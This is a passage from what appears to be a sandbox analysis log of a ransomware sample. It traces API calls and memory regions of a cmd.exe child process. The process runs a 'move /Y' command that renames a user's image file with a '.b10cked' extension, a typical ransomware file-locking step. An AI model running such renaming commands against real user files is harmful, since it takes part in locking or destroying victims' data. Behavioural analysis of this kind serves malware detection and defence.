lpNumberOfCharsWritten=0x2eef7c*=0x1a) returned 1 [0232.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.149] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.175] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.175] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.176] SetConsoleInputExeNameW () returned 0x1 [0232.176] GetConsoleOutputCP () returned 0x1b5 [0232.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.191] exit (_Code=0) Process: id = "609" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0x308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34365 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34366 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: 
id = 34367 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34368 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34369 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34370 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34371 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34372 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34373 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34374 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34519 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34520 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34521 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34522 start_va = 
0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 34523 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 34524 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34525 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34526 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34527 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34528 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34529 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34530 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34531 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" 
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34532 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34533 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 34534 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34535 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34536 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34537 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34538 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34539 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34540 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 34541 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 34542 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 847 os_tid = 0x42c [0231.543] GetSystemTimeAsFileTime (in: 
lpSystemTimeAsFileTime=0x18f904 | out: lpSystemTimeAsFileTime=0x18f904*(dwLowDateTime=0xbd8fbec0, dwHighDateTime=0x1d440a9)) [0231.543] GetCurrentProcessId () returned 0x308 [0231.543] GetCurrentThreadId () returned 0x42c [0231.543] GetTickCount () returned 0x3fb8d [0231.543] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8fc | out: lpPerformanceCount=0x18f8fc*=28833257457) returned 1 [0231.544] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.544] __set_app_type (_Type=0x1) [0231.544] __p__fmode () returned 0x76b331f4 [0231.544] __p__commode () returned 0x76b331fc [0231.544] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.545] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.545] GetCurrentThreadId () returned 0x42c [0231.545] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x42c) returned 0x38 [0231.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.545] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.545] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.545] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.545] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f894 | out: phkResult=0x18f894*=0x0) returned 0x2 [0231.545] VirtualQuery (in: lpAddress=0x18f8cb, lpBuffer=0x18f864, dwLength=0x1c | out: lpBuffer=0x18f864*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.545] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f864, dwLength=0x1c | out: lpBuffer=0x18f864*(BaseAddress=0x90000, AllocationBase=0x90000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.545] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f864, dwLength=0x1c | out: lpBuffer=0x18f864*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.545] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f864, dwLength=0x1c | out: lpBuffer=0x18f864*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.545] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f864, dwLength=0x1c | out: lpBuffer=0x18f864*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.545] GetConsoleOutputCP () returned 0x1b5 [0231.545] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.545] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.546] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.546] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.546] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.546] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.546] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.546] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.546] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.546] GetEnvironmentStringsW () returned 0x2301b0* [0231.547] FreeEnvironmentStringsW (penv=0x2301b0) returned 1 [0231.547] GetEnvironmentStringsW () returned 0x2301b0* [0231.547] FreeEnvironmentStringsW 
(penv=0x2301b0) returned 1 [0231.547] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e804 | out: phkResult=0x18e804*=0x40) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0xe8, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x1, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0x1, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x0, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x40, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x40, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0x40, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegCloseKey (hKey=0x40) returned 0x0 [0231.547] RegOpenKeyExW (in: 
hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e804 | out: phkResult=0x18e804*=0x40) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0x40, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x1, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0x1, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x0, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x9, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x4, lpData=0x18e810*=0x9, lpcbData=0x18e808*=0x4) returned 0x0 [0231.547] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e80c, lpData=0x18e810, lpcbData=0x18e808*=0x1000 | out: lpType=0x18e80c*=0x0, lpData=0x18e810*=0x9, lpcbData=0x18e808*=0x1000) returned 0x2 [0231.547] RegCloseKey (hKey=0x40) returned 0x0 [0231.547] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.547] srand (_Seed=0x5b8863bf) 
[0231.547] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked\"" [0231.547] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--QNZ~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Q--qnZ17d.bmp.b10cked\"" [0231.548] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.548] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x231910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.548] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.548] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.548] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.548] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.548] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.548] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.548] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.548] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.548] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.548] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.548] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.548] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.548] 
GetEnvironmentStringsW () returned 0x232300* [0231.549] FreeEnvironmentStringsW (penv=0x232300) returned 1 [0231.549] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.549] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.549] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.549] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.549] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.549] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.549] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.549] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.549] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.549] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.549] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f5d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.549] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f5d0, lpFilePart=0x18f5cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f5cc*="Desktop") returned 0x18 [0231.549] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.549] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f34c | out: lpFindFileData=0x18f34c) returned 0x230040 [0231.549] FindClose (in: hFindFile=0x230040 | out: hFindFile=0x230040) returned 1 [0231.549] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f34c | out: lpFindFileData=0x18f34c) returned 0x230040 [0231.549] FindClose (in: hFindFile=0x230040 | out: hFindFile=0x230040) returned 1 [0231.550] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f34c | out: 
lpFindFileData=0x18f34c) returned 0x230040 [0231.550] FindClose (in: hFindFile=0x230040 | out: hFindFile=0x230040) returned 1 [0231.550] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.550] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.550] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.550] GetEnvironmentStringsW () returned 0x232b20* [0231.550] FreeEnvironmentStringsW (penv=0x232b20) returned 1 [0231.550] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.551] GetConsoleOutputCP () returned 0x1b5 [0231.551] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.551] GetUserDefaultLCID () returned 0x409 [0231.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f710, cchData=128 | out: lpLCData="0") returned 2 [0231.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f710, cchData=128 | out: lpLCData="0") returned 2 [0231.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f710, cchData=128 | out: lpLCData="1") returned 2 [0231.551] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, 
cchData=32 | out: lpLCData="Thu") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.552] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.552] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.553] GetConsoleTitleW (in: lpConsoleTitle=0x220900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.553] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.553] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0231.553] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0231.553] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0231.554] _wcsicmp (_String1="move", _String2=")") returned 68 [0231.554] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0231.554] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0231.554] _wcsicmp (_String1="IF", _String2="move") returned -4 [0231.554] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0231.554] _wcsicmp (_String1="REM", _String2="move") returned 5 [0231.554] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0231.558] GetConsoleTitleW (in: lpConsoleTitle=0x18f408, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.558] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0231.558] _wcsicmp (_String1="move", _String2="ERASE") returned 8 
[0231.558] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0231.558] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0231.558] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0231.558] _wcsicmp (_String1="move", _String2="CD") returned 10 [0231.558] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0231.558] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0231.558] _wcsicmp (_String1="move", _String2="REN") returned -5 [0231.558] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0231.558] _wcsicmp (_String1="move", _String2="SET") returned -6 [0231.558] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0231.558] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0231.559] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0231.559] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0231.559] _wcsicmp (_String1="move", _String2="MD") returned 11 [0231.559] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0231.559] _wcsicmp (_String1="move", _String2="RD") returned -5 [0231.559] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0231.559] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0231.559] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0231.559] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0231.559] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0231.559] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0231.559] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0231.559] _wcsicmp (_String1="move", _String2="VER") returned -9 [0231.559] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0231.559] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0231.559] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0231.559] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0231.559] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0231.559] _wcsicmp (_String1="move", _String2="START") 
returned -6 [0231.559] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0231.559] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0231.559] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0231.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.561] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0231.561] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1c4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1bc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f1bc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0231.561] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 